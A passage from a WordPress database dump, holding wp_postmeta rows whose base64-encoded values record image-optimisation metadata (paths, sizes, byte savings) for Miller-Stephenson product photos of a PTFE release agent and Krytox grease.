wiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi03Njh4NDMyLmpwZyIsInJlZHVjdGlvbiI6MjUxOCwidGltZSI6MTQ4MzU3NjgwMiwiaWQiOjEwNzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTE2MDB4OTAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjkwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTE2MDB4OTAwLmpwZyIsInJlZHVjdGlvbiI6ODg0OCwidGltZSI6MTQ4MzU3NjgwOCwiaWQiOjEwNzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxMDA4LCJ0aW1lIjoxNDgzNTc2ODEyLCJpZCI6MTA3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjgzOCwidGltZSI6MTQ4MzU3NjgxNiwiaWQiOjEwNzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo5OTksInRpbWUiOjE0ODM1NzY4MjAsImlkIjoxMDc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjQzMywidGltZSI6MTQ4MzU3NjgyNCwiaWQiOjEwNzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjcxMywidGltZSI6MTQ4MzU3NjgyNywiaWQiOjEwNzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjcxMSwidGltZSI6MTQ4MzU3NjgzMSwiaWQiOjEwNzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjgwOSwidGltZSI6MTQ4MzU3NjgzNCwiaWQiOjEwNzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9QVEZFLXJlbGVhc2UtYWdlbnQtTWlsbGVyLVN0ZXBoZW5zb24tMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwODUsInRpbWUiOjE0ODM1NzY4MzgsImlkIjoxMDc4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUFRGRS1yZWxlYXNlLWFnZW50LU1pbGxlci1TdGVwaGVuc29uLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMTg0LCJ0aW1lIjoxNDgzNTc2ODQyLCJpZCI6MTA3OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1BURkUtcmVsZWFzZS1hZ2VudC1NaWxsZXItU3RlcGhlbnNvbi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTY1OCwidGltZSI6MTQ4MzU3Njg0NiwiaWQiOjEwNzh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29780, 1076, 'wpfc_optimisation_reduction', '14849'); 
INSERT INTO `wp_postmeta` VALUES (29781, 1076, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc2ODUwLCJpZCI6IjEwNzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTc2ODU0LCJpZCI6MTA3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEyMzcsInRpbWUiOjE0ODM1NzY4NTcsImlkIjoxMDc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTEwOCwidGltZSI6MTQ4MzU3Njg2MSwiaWQiOjEwNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjY0NDAsInRpbWUiOjE0ODM1NzY4NjUsImlkIjoxMDc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTAxLCJ0aW1lIjoxNDgzNTc2ODY4LCJpZCI6MTA3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU3Njg3MiwiaWQiOjEwNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NDksInRpbWUiOjE0ODM1NzY4NzUsImlkIjoxMDc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTA0NSwidGltZSI6MTQ4MzU3Njg3OSwiaWQiOjEwNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQzMSwidGltZSI6MTQ4MzU3Njg4MiwiaWQiOjEwNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU3Njg4NiwiaWQiOjEwNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ0OCwidGltZSI6MTQ4MzU3Njg4OSwiaWQiOjEwNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU1NywidGltZSI6MTQ4MzU3Njg5MywiaWQiOjEwNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTMwMHgzM